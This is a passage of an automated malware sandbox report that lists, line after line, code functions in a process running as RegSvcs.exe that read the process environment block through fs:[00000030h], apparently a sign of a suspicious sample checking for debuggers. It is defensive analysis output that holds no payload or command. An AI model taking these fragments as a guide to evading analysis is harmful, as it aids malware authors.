          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191A250 mov eax, dword ptr fs:[00000030h]9_2_0191A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191A250 mov eax, dword ptr fs:[00000030h]9_2_0191A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E8243 mov eax, dword ptr fs:[00000030h]9_2_018E8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E8243 mov ecx, dword ptr fs:[00000030h]9_2_018E8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0193625D mov eax, dword ptr fs:[00000030h]9_2_0193625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185A250 mov eax, dword ptr fs:[00000030h]9_2_0185A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866259 mov eax, dword ptr fs:[00000030h]9_2_01866259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864260 mov eax, dword ptr fs:[00000030h]9_2_01864260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864260 mov eax, dword ptr fs:[00000030h]9_2_01864260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864260 mov eax, dword ptr fs:[00000030h]9_2_01864260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185826B mov eax, dword ptr fs:[00000030h]9_2_0185826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01894588 mov eax, dword ptr fs:[00000030h]9_2_01894588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01862582 mov eax, dword ptr fs:[00000030h]9_2_01862582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01862582 mov ecx, dword ptr fs:[00000030h]9_2_01862582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E59C mov eax, dword ptr fs:[00000030h]9_2_0189E59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E05A7 mov eax, dword ptr fs:[00000030h]9_2_018E05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E05A7 mov eax, dword ptr fs:[00000030h]9_2_018E05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E05A7 mov eax, dword ptr fs:[00000030h]9_2_018E05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018845B1 mov eax, dword ptr fs:[00000030h]9_2_018845B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018845B1 mov eax, dword ptr fs:[00000030h]9_2_018845B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E5CF mov eax, dword ptr fs:[00000030h]9_2_0189E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E5CF mov eax, dword ptr fs:[00000030h]9_2_0189E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018665D0 mov eax, dword ptr fs:[00000030h]9_2_018665D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A5D0 mov eax, dword ptr fs:[00000030h]9_2_0189A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A5D0 mov eax, dword ptr fs:[00000030h]9_2_0189A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C5ED mov eax, dword ptr fs:[00000030h]9_2_0189C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C5ED mov eax, dword ptr fs:[00000030h]9_2_0189C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018625E0 mov eax, dword ptr fs:[00000030h]9_2_018625E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F6500 mov eax, dword ptr fs:[00000030h]9_2_018F6500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868550 mov eax, dword ptr fs:[00000030h]9_2_01868550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868550 mov eax, dword ptr fs:[00000030h]9_2_01868550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189656A mov eax, dword ptr fs:[00000030h]9_2_0189656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189656A mov eax, dword ptr fs:[00000030h]9_2_0189656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189656A mov eax, dword ptr fs:[00000030h]9_2_0189656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191A49A mov eax, dword ptr fs:[00000030h]9_2_0191A49A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018664AB mov eax, dword ptr fs:[00000030h]9_2_018664AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018944B0 mov ecx, dword ptr fs:[00000030h]9_2_018944B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EA4B0 mov eax, dword ptr fs:[00000030h]9_2_018EA4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018604E5 mov ecx, dword ptr fs:[00000030h]9_2_018604E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898402 mov eax, dword ptr fs:[00000030h]9_2_01898402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898402 mov eax, dword ptr fs:[00000030h]9_2_01898402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898402 mov eax, dword ptr fs:[00000030h]9_2_01898402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185C427 mov eax, dword ptr fs:[00000030h]9_2_0185C427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E420 mov eax, dword ptr fs:[00000030h]9_2_0185E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E420 mov eax, dword ptr fs:[00000030h]9_2_0185E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E420 mov eax, dword ptr fs:[00000030h]9_2_0185E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A430 mov eax, dword ptr fs:[00000030h]9_2_0189A430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191A456 mov eax, dword ptr fs:[00000030h]9_2_0191A456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188245A mov eax, dword ptr fs:[00000030h]9_2_0188245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185645D mov eax, dword ptr fs:[00000030h]9_2_0185645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EC460 mov ecx, dword ptr fs:[00000030h]9_2_018EC460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188A470 mov eax, dword ptr fs:[00000030h]9_2_0188A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188A470 mov eax, dword ptr fs:[00000030h]9_2_0188A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188A470 mov eax, dword ptr fs:[00000030h]9_2_0188A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190678E mov eax, dword ptr fs:[00000030h]9_2_0190678E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018607AF mov eax, dword ptr fs:[00000030h]9_2_018607AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019147A0 mov eax, dword ptr fs:[00000030h]9_2_019147A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186C7C0 mov eax, dword ptr fs:[00000030h]9_2_0186C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E07C3 mov eax, dword ptr fs:[00000030h]9_2_018E07C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018827ED mov eax, dword ptr fs:[00000030h]9_2_018827ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018827ED mov eax, dword ptr fs:[00000030h]9_2_018827ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018827ED mov eax, dword ptr fs:[00000030h]9_2_018827ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EE7E1 mov eax, dword ptr fs:[00000030h]9_2_018EE7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018647FB mov eax, dword ptr fs:[00000030h]9_2_018647FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018647FB mov eax, dword ptr fs:[00000030h]9_2_018647FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C700 mov eax, dword ptr fs:[00000030h]9_2_0189C700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860710 mov eax, dword ptr fs:[00000030h]9_2_01860710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01890710 mov eax, dword ptr fs:[00000030h]9_2_01890710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C720 mov eax, dword ptr fs:[00000030h]9_2_0189C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C720 mov eax, dword ptr fs:[00000030h]9_2_0189C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189273C mov eax, dword ptr fs:[00000030h]9_2_0189273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189273C mov ecx, dword ptr fs:[00000030h]9_2_0189273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189273C mov eax, dword ptr fs:[00000030h]9_2_0189273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DC730 mov eax, dword ptr fs:[00000030h]9_2_018DC730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189674D mov esi, dword ptr fs:[00000030h]9_2_0189674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189674D mov eax, dword ptr fs:[00000030h]9_2_0189674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189674D mov eax, dword ptr fs:[00000030h]9_2_0189674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EE75D mov eax, dword ptr fs:[00000030h]9_2_018EE75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860750 mov eax, dword ptr fs:[00000030h]9_2_01860750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2750 mov eax, dword ptr fs:[00000030h]9_2_018A2750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2750 mov eax, dword ptr fs:[00000030h]9_2_018A2750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E4755 mov eax, dword ptr fs:[00000030h]9_2_018E4755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868770 mov eax, dword ptr fs:[00000030h]9_2_01868770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864690 mov eax, dword ptr fs:[00000030h]9_2_01864690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864690 mov eax, dword ptr fs:[00000030h]9_2_01864690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C6A6 mov eax, dword ptr fs:[00000030h]9_2_0189C6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018966B0 mov eax, dword ptr fs:[00000030h]9_2_018966B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0189A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A6C7 mov eax, dword ptr fs:[00000030h]9_2_0189A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE6F2 mov eax, dword ptr fs:[00000030h]9_2_018DE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE6F2 mov eax, dword ptr fs:[00000030h]9_2_018DE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE6F2 mov eax, dword ptr fs:[00000030h]9_2_018DE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE6F2 mov eax, dword ptr fs:[00000030h]9_2_018DE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E06F1 mov eax, dword ptr fs:[00000030h]9_2_018E06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E06F1 mov eax, dword ptr fs:[00000030h]9_2_018E06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE609 mov eax, dword ptr fs:[00000030h]9_2_018DE609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2619 mov eax, dword ptr fs:[00000030h]9_2_018A2619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E627 mov eax, dword ptr fs:[00000030h]9_2_0187E627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01896620 mov eax, dword ptr fs:[00000030h]9_2_01896620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898620 mov eax, dword ptr fs:[00000030h]9_2_01898620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186262C mov eax, dword ptr fs:[00000030h]9_2_0186262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187C640 mov eax, dword ptr fs:[00000030h]9_2_0187C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A660 mov eax, dword ptr fs:[00000030h]9_2_0189A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A660 mov eax, dword ptr fs:[00000030h]9_2_0189A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192866E mov eax, dword ptr fs:[00000030h]9_2_0192866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192866E mov eax, dword ptr fs:[00000030h]9_2_0192866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01892674 mov eax, dword ptr fs:[00000030h]9_2_01892674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
